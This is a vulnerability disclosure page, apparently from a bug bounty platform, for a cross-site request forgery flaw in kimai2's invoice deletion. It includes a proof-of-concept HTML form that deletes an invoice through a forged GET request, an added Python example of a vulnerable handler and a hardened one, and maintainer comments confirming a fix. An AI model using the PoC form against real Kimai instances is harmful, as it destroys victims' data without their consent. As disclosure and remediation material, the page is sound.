Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2

Status: Valid

Reported on Oct 16th 2021


Description

The invoice delete functionality in kevinpapst/kimai2 is vulnerable to Cross-Site Request Forgery (CSRF).

Proof of Concept


1. Log in to the admin account at https://www.kimai.org/demo/

2. Go to Invoices, scroll down to the invoice preview and click "Save all". This redirects to https://demo-stable.kimai.org/en/invoice/show

3. Click delete on any invoice and capture the request with the Burp interceptor.

4. The captured delete request, reproduced as a form below, can be replayed from a third-party page inside the victim's authenticated session: it is vulnerable to CSRF.

<!DOCTYPE html>
<html>
<body>
    <!-- The delete action is a plain GET on a predictable URL; submitting this form
         from any page the logged-in admin visits deletes invoice id 2. -->
    <form method="GET" action="https://demo-stable.kimai.org:443/en/invoice/delete/2">
        <input type="text" name="PHPSESSID" value="begjept58rut8ptt4r0sgc4asi">
        <input type="submit" value="Send">
    </form>
</body>
</html>
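To show what the PoC relies on and what closes it, here is an added example (not Kimai's code, and not the researcher's) that models the `/en/invoice/delete/<id>` handler twice: once gated only by the session cookie, as the PoC abuses, and once requiring POST, a same-site Origin/Referer and a per-session CSRF token. The `Request` class, session store and `_token` field name are assumptions for the illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://demo-stable.kimai.org"  # application origin named in the report

@dataclass
class Request:
    method: str
    path: str
    cookies: dict
    headers: dict = field(default_factory=dict)  # browser-set Origin / Referer
    form: dict = field(default_factory=dict)     # POST body fields

SESSIONS = {}  # constructed session store: session id -> {"user", "csrf"}

def login(user):
    """Create an authenticated session; the browser carries its id in PHPSESSID."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid

def _session(req):
    return SESSIONS.get(req.cookies.get("PHPSESSID"))

def _invoice_id(req):
    return int(req.path.rsplit("/", 1)[1])  # path form: /en/invoice/delete/<id>

def _same_origin(value):
    """Compare scheme://host of an Origin or Referer header against SITE_ORIGIN."""
    u = urlsplit(value)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN

def delete_invoice_vulnerable(req, invoices):
    """Pattern the PoC abuses: a state-changing GET gated only by the session cookie."""
    if _session(req) is None:
        return 403
    invoices.pop(_invoice_id(req), None)
    return 302

def delete_invoice_hardened(req, invoices):
    """Same action with the usual CSRF defences layered on."""
    sess = _session(req)
    if sess is None:
        return 403
    if req.method != "POST":  # state changes never ride on GET
        return 405
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not _same_origin(origin):  # cross-site submissions are refused
        return 403
    if not hmac.compare_digest(req.form.get("_token", ""), sess["csrf"]):
        return 403  # token must match the one bound to this session
    invoices.pop(_invoice_id(req), None)
    return 302
```

With the hardened handler, the GET form from the PoC is rejected with 405 and a forged cross-site POST with 403, while a same-site POST carrying the session's token still deletes the invoice.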



# Impact

In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Here it is the deletion of invoices by an authenticated administrator.
We have contacted a member of the kevinpapst/kimai2 team and are waiting to hear back (a month ago)
Asura-N modified their report (a month ago)
Kevin Papst validated this vulnerability (a month ago)
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Papst
a month ago

Maintainer


@asura-n thanks for posting and sorry for the delay!

Asura-N
a month ago

Researcher


Thanks @kevin papst

Kevin Papst submitted a (a month ago)
Kevin Papst confirmed that a fix has been merged on 1d32e4 (a month ago)
Kevin Papst has been awarded the fix bounty